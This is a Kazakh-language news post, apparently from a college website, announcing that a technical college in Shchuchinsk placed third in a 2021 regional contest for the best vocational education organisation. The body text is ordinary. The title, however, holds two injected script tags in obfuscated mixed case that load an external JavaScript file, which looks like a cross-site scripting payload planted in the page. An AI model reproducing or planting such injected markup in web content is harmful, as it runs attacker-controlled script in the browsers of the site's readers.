Текст
«ТжКБ үздік ұйымы" байқауының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.04.2021
Ақмола облысының білім басқармасы 2021 жылдың наурыз айында Ақмола облысының мемлекеттік колледждері арасында "Техникалық және кәсіптік білім берудің үздік ұйымы" байқауын өткізді.
Бағалаудың негізгі өлшемшарттары: қызмет сапасы, кәсіби кадрлар, бизнес-қоғамдастықпен өзара іс-қимыл, WorldSkills қозғалысына және басқа да инновациялық жобаларға қатысу, сондай-ақ білім алушылар контингенті сияқты көрсеткіштер болды.
Конкурстық комиссия ұсынған материалдарды қарастыру нәтижесі бойынша Щучинск қ. Жоғары техникалық колледжі 208 ұпай жинап, 3 орынға ие болды.
Біздің оқу орнымыз жыл сайын осы байқауға қатысатынын атап айтқымыз келеді. 2019 жылы колледж 4 орынға, ал 2020 жылы-2 орынға ие болды.
Колледж ұжымын құттықтай отырып шығармашылық табыс тілейміз!
Просмотров: 709